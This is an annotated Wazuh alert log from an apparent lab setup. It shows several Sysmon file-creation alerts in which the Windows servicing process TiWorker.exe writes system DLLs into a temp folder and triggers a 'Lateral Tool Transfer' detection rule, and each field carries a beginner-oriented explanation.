rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 27 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.700866 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2352253Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260612 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.233
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-debug-l1-1-1.dll
CreationUtcTime: 2025-04-20 01:55:28.233
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.233 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-debug-l1-1-1.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.233 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 28 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.703960 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2373860Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260613 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.235
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-delayload-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.235
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.235 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-delayload-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.235 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 29 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.707070 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2613251Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260622 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.260
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\API-MS-Win-core-file-l2-1-1.dll
CreationUtcTime: 2025-04-20 01:55:28.260
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.260 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\API-MS-Win-core-file-l2-1-1.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.260 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 30 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.710160 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.2870179Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260632 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.286
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll
CreationUtcTime: 2025-04-20 01:55:28.284
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.286 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\API-MS-Win-Core-Kernel32-Private-L1-1-1.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.284 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 31 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.713298 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.3162385Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260644 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.313
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-processenvironment-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.313
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-processenvironment-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.313 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 32 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.716444 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.3496143Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260657 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.348
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-shutdown-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.348
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.348 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-532b-6804-6b09-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12512 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-core-shutdown-l1-1-0.dll No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-20 01:55:28.348 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable dropped in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92217 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1570'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Lateral Movement'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Lateral Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 33 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534154.719550 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.3842941Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 260671 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-20 01:55:28.382
ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00}
ProcessId: 12512
Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe
TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-core-timezone-l1-1-0.dll
CreationUtcTime: 2025-04-20 01:55:28.382
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-20 01:55:28.382 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
